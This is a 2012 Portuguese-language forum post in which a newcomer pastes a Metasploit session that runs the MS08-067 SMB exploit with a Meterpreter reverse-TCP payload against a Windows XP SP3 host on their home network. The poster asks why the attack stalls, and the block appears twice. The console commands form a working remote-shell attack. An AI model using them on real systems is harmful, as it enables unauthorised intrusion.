Enviado em 24/09/2012 - 23:25h
boa noite galera, sou novo aqui no forum e andei testando o metasploit baixado para versão 32bits no metasploit.com e quando executo os comandos gostaria de saber o por que ele não vai mais além do que descrito abaixo.
msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.1.2
rhost => 192.168.1.2
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf exploit(ms08_067_netapi) > set target 58
target => 58
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.3:4444
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) >
ps.: testei na minha rede particupar com um pc com windows xp sp3.
Se alguém puder me dar um help ficarei muito grato.
msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.1.2
rhost => 192.168.1.2
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf exploit(ms08_067_netapi) > set target 58
target => 58
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.3:4444
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) >
ps.: testei na minha rede particupar com um pc com windows xp sp3.
Se alguém puder me dar um help ficarei muito grato.